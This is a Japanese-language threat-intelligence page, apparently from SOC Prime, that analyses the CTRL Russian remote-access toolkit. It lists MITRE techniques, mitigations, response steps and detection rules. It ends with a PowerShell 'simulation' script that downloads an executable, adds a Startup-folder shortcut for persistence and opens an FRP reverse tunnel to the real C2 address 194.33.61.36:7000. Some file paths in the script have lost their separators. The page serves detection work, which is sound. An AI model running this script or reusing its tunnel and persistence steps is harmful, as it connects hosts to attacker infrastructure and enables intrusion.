SOC Prime Bias: 重大

31 3月 2026 17:07

コントロール下: ドキュメント化されていないロシアの.Netアクセスフレームワークの解析

Author Photo
Ruslan Mikhalov SOC Primeの脅威リサーチ責任者 linkedin icon フォローする
コントロール下: ドキュメント化されていないロシアの.Netアクセスフレームワークの解析
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

概要

Censys ARCは、資格情報フィッシング、キー記録、RDPハイジャック、FRPベースのリバーストンネルを組み合わせた、以前は文書化されていなかったロシアのリモートアクセスツールキットであるCTRLを発見しました。このフレームワークは悪意のあるLNKファイルを介して配信され、バイナリはWindowsレジストリ内に隠され、その後メモリに直接ロードされます。そのネットワークインフラストラクチャには、ドメインが含まれています hui228.ru およびポート7000でFRPサーバーを稼働する2つのIPアドレスがあります。このツールキットはWindowsホストをターゲットにし、スケジュールされたタスク、隠されたローカルユーザーアカウント、レジストリベースの変更によって永続性を維持します。

調査

研究者はLNKドロッパーを特定し、レイヤー化されたPowerShellローダーを再構築し、Explorerレジストリキーの下に格納されている段階的な.NETバイナリを追跡しました。 REG_BINARY 値として保存されています。スタージャーはその後後続のペイロードをダウンロードし、隠されたctrl.exeローダーを作成し、FRPトンネルを設定し、RDPラッパーをデプロイして無制限のリモートセッションを許可します。観察されたアーティファクトは公衆の脅威情報フィードには表示されなかったため、このフレームワークはプライベートで目的に応じたアクセスプラットフォームであることを示唆しています。

緩和策

ディフェンダーは、Explorerキー下での異常なレジストリ書き込み、DriverSvcTask、NetTcpSvc、TermSvcHost、またはWindowsHealthMonitorという名前のスケジュールされたタスクの作成、および管理者またはリモートデスクトップユーザーグループに追加された隠しローカルアカウントを監視する必要があります。識別されたIPアドレスへのアウトバウンド接続およびFRPポート7000をブロックし、予期しないシステムでFRPプロトコルのトラフィックをフラグする必要があります。認可されていないFRPまたはRDPラッパーのインストールを削除し、PowerShellの実行を厳しく制御する必要があります。

対応策

CTRL関連のアクティビティが見つかった場合は、エンドポイントを隔離し、LNKファイルと関連するレジストリハイブをインシデント調査用に取得し、ctrl.exeプロセスを停止し、関連するスケジュールされたタスクを削除してください。新たに作成されたローカルアカウントは無効化し、許可されていないRDP権限を取り消し、露出した資格情報をローテーションする必要があります。チームはその後、追加のFRPサーバーを識別するために広範な環境をスキャンし、観察されたIOCに基づいて検出ルールを更新する必要があります。

"graph TB %% Class Definitions Section classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef process fill:#ffeb99 classDef file fill:#dddddd %% Nodes u2013 Actions (MITRE Techniques) action_user_exec["<b>Action</b> – <b>T1204.002 User Execution</b>: Victim clicks malicious .lnk shortcut"] class action_user_exec action action_lnk_smuggle["<b>Action</b> – <b>T1027.012 LNK Icon Smuggling</b>: Shortcut disguises itself with a folder icon"] class action_lnk_smuggle action action_powershell["<b>Action</b> – <b>T1059.001 PowerShell</b>: Hidden PowerShell command decodes payload"] class action_powershell action action_deobfuscate["<b>Action</b> – <b>T1140 Deobfuscate/Decode Files</b>: Multiple Base64 and Deflate stages"] class action_deobfuscate action action_obfuscation["<b>Action</b> – <b>T1027 Obfuscated Files or Information</b>: Randomized variable names and runtime string construction"] class action_obfuscation action action_shortcut_persistence["<b>Action</b> – <b>T1547.009 Shortcut Modification</b>: LNK serves as persistence mechanism"] class action_shortcut_persistence action action_scheduled_tasks["<b>Action</b> – <b>T1053 Scheduled Task/Job</b>: Four tasks created to run binaries at startup"] class action_scheduled_tasks action action_create_account["<b>Action</b> – <b>T1136.001 Create Account</b>: Hidden local administrator account added"] class action_create_account action action_uac_bypass["<b>Action</b> – <b>T1548 Abuse Elevation Control Mechanism</b>: fodhelper.exe registry hijack bypasses UAC"] class action_uac_bypass action action_proxy_execution["<b>Action</b> – <b>T1218 System Binary Proxy Execution</b>: wlrmdr.exe used to execute payload with elevated rights"] class action_proxy_execution action action_priv_esc["<b>Action</b> – <b>T1068 Exploitation for Privilege Escalation</b>: patches termsrv.dll and installs RDP Wrapper"] class action_priv_esc action action_masquerade["<b>Action</b> – <b>T1036 Masquerading</b>: Files placed in hidden directories with legitimateu2011looking names"] class action_masquerade action action_hide_artifacts["<b>Action</b> – <b>T1564 Hide Artifacts</b>: Defender exclusions, timestamp falsification, registry mimicry"] class action_hide_artifacts action action_keylogging["<b>Action</b> – <b>T1056.001 Input Capture u2013 Keylogging</b>: Lowu2011level keyboard hook writes to C:Tempkeylog.txt"] class action_keylogging action action_cred_harvest["<b>Action</b> – Credential Harvesting: Custom WPF Windows Hello UI captures PINs"] class action_cred_harvest action action_rdp["<b>Action</b> – <b>T1021.001 Remote Services u2013 RDP</b>: RDP Wrapper enables remote desktop access"] class action_rdp action action_rdp_hijack["<b>Action</b> – <b>T1563.002 Remote Service Session Hijacking</b>: Attacker shadows active sessions via mstsc /shadow"] class action_rdp_hijack action action_frp_proxy["<b>Action</b> – <b>T1090.002 Proxy u2013 External Proxy</b>: FRP tunnel to hui228.ru:7000 acts as external proxy"] class action_frp_proxy action action_encrypted_channel["<b>Action</b> – <b>T1573 Encrypted Channel</b>: FRP traffic encrypted, AESu2011256u2011CBC payload decryption"] class action_encrypted_channel action action_valid_accounts["<b>Action</b> – <b>T1078.003 Valid Accounts u2013 Local Accounts</b>: Hidden admin account used for persistence and lateral movement"] class action_valid_accounts action action_lateral_movement["<b>Action</b> – Lateral Movement: Use of valid local admin accounts to spread within the network"] class action_lateral_movement action %% Nodes u2013 Tools / Files / Processes tool_lnk["<b>Tool</b> – Weaponized .lnk Shortcut<br/><b>File</b>: kfxm7p9q_yek.lnk"] class tool_lnk tool tool_powershell["<b>Tool</b> – PowerShell<br/><b>Purpose</b>: Execute hidden script that decodes and decompresses .NET stager"] class tool_powershell tool process_stager["<b>Process</b> – .NET Stager stored as REG_BINARY under HKCU…Explorer"] class process_stager process tool_fodhelper["<b>Tool</b> – fodhelper.exe (Windows Utility)"] class tool_fodhelper tool tool_wlrmdr["<b>Tool</b> – wlrmdr.exe (signed Microsoft binary)"] class tool_wlrmdr tool tool_rdpwrapper["<b>Tool</b> – RDP Wrapper<br/><b>Function</b>: Enables unlimited concurrent RDP sessions"] class tool_rdpwrapper tool tool_frp["<b>Tool</b> – FRP client<br/><b>Function</b>: Reverse tunnel to external server"] class tool_frp tool keylog_file["<b>File</b> – C:Tempkeylog.txt<br/><b>Content</b>: Captured keystrokes"] class keylog_file file %% Connections u2013 Attack Flow action_user_exec –>|launches| tool_lnk tool_lnk –>|triggers| action_lnk_smuggle action_lnk_smuggle –>|leads to| action_powershell action_powershell –>|executes| tool_powershell tool_powershell –>|stores payload in| process_stager process_stager –>|decoded by| action_deobfuscate action_deobfuscate –>|enables| action_obfuscation action_obfuscation –>|supports| action_shortcut_persistence action_shortcut_persistence –>|creates| action_scheduled_tasks action_scheduled_tasks –>|creates| action_create_account action_create_account –>|facilitates| action_uac_bypass action_uac_bypass –>|uses| tool_fodhelper action_uac_bypass –>|uses| tool_wlrmdr action_uac_bypass –>|enables| action_proxy_execution action_proxy_execution –>|facilitates| action_priv_esc action_priv_esc –>|installs| tool_rdpwrapper action_priv_esc –>|enables| action_masquerade action_masquerade –>|leads to| action_hide_artifacts action_hide_artifacts –>|adds| action_keylogging action_keylogging –>|writes to| keylog_file action_keylogging –>|supports| action_cred_harvest action_cred_harvest –>|enables| action_rdp action_rdp –>|used for| action_rdp_hijack action_rdp_hijack –>|sets up| action_frp_proxy action_frp_proxy –>|provides| action_encrypted_channel action_encrypted_channel –>|allows| action_valid_accounts action_valid_accounts –>|used for| action_lateral_movement %% Styling Assignments class tool_lnk,tool_powershell,tool_fodhelper,tool_wlrmdr,tool_rdpwrapper,tool_frp tool class process_stager process class keylog_file file "

攻撃フロー

検出

リモートデスクトップサービスシャドウの可能性(via registry_event)

SOC Prime チーム
2026年3月31日

疑わしいPowerShell文字列(via powershell)

SOC Prime チーム
2026年3月31日

疑わしいPowerShell文字列(via cmdline)

SOC Prime チーム
2026年3月31日

Windows Defenderの設定で疑わしい変更(via powershell)

SOC Prime チーム
2026年3月31日

FodHelperにおける権限昇格(UACバイパス)(via registry_event)

SOC Prime チーム
2026年3月31日

検出するためのIOC(HashSha256):以前は文書化されていなかったロシアの.Netアクセスフレームワークを解剖する:CTRLの下

SOC Prime AI ルール
2026年3月31日

検出するためのIOC(DestinationIP):以前は文書化されていなかったロシアの.Netアクセスフレームワークを解剖する:CTRLの下

SOC Prime AI ルール
2026年3月31日

検出するためのIOC(メール):以前は文書化されていなかったロシアの.Netアクセスフレームワークを解剖する:CTRLの下

SOC Prime AI ルール
2026年3月31日

検出するためのIOC(SourceIP):以前は文書化されていなかったロシアの.Netアクセスフレームワークを解剖する:CTRLの下

SOC Prime AI ルール
2026年3月31日

不正なFRPリバーストンネル接続を検出 [Windowsネットワーク接続]

SOC Prime AI ルール
2026年3月31日

Explorerレジストリキー経由のCTRL Toolkitの永続性を検出 [Windowsレジストリエベント]

SOC Prime AI ルール
2026年3月31日

エンコードされたペイロードを伴う難読化されたPowerShell実行を検出 [Windows Powershell]

SOC Prime AI ルール
2026年3月31日

シミュレーショング実行

前提条件:テレメトリー & ベースラインの事前チェックが合格していること。

  • 攻撃の話と指令:
    攻撃者は既にFRPクライアント(frp.exe)を悪意のあるフィッシング添付ファイルを通じて侵害されたWindowsホストにドロップしました。永続性を維持するために、攻撃者はスタートアップフォルダにショートカットを登録し、C2サーバー 194.33.61.36:7000を指す設定でFRPを起動します。ユーザーがログオンすると、ショートカットがFRPを起動し、逆方向のTCPトンネルが攻撃者に戻り、攻撃者はトンネルを介して任意のローカルサービス(例:SMB)を転送することができます。FRPが生成するネットワーク接続はルールの dst_ip and dst_port 基準に一致し、アラートが発生します。

  • リグレッションテストスクリプト: (PowerShell – 自己完結型)

    # =============================================================================
    # FRP Reverse Tunnel Simulation – triggers Sigma rule fcb13968-1490-44c2-9f9f-c1ad2b668ce6
    # =============================================================================
    # Variables
    $frpUrl      = "https://example.com/frp.exe"          # replace with a reachable test binary
    $frpPath     = "$env:ProgramDatafrp.exe"
    $cfgPath     = "$env:ProgramDatafrp_client.ini"
    $c2Ip        = "194.33.61.36"
    $c2Port      = "7000"
    $startupLnk  = "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupFRP.lnk"
    
    # 1. Download FRP binary (simulated – use any small executable for test)
    Invoke-WebRequest -Uri $frpUrl -OutFile $frpPath -UseBasicParsing
    
    # 2. Create minimal FRP client config
    @"
    [common]
    server_addr = $c2Ip
    server_port = $c2Port
    
    [ssh]
    type = tcp
    local_port = 22
    remote_port = 6000
    "@ | Set-Content -Path $cfgPath -Encoding ASCII
    
    # 3. Create a shortcut in the Startup folder to run FRP on boot
    $ws = New-Object -ComObject WScript.Shell
    $shortcut = $ws.CreateShortcut($startupLnk)
    $shortcut.TargetPath = $frpPath
    $shortcut.Arguments  = "-c `"$cfgPath`""
    $shortcut.WorkingDirectory = Split-Path $frpPath
    $shortcut.Save()
    
    # 4. Launch FRP now (so we can see the telemetry immediately)
    Start-Process -FilePath $frpPath -ArgumentList "-c `"$cfgPath`"" -WindowStyle Hidden
    
    Write-Host "FRP reverse tunnel launched. Check SIEM for detection."
  • クリーンアップコマンド:

    # Stop FRP process
    Get-Process -Name frp -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Remove files and shortcut
    Remove-Item -Path "$env:ProgramDatafrp.exe" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:ProgramDatafrp_client.ini" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupFRP.lnk" -Force -ErrorAction SilentlyContinue
    
    Write-Host "Cleanup completed."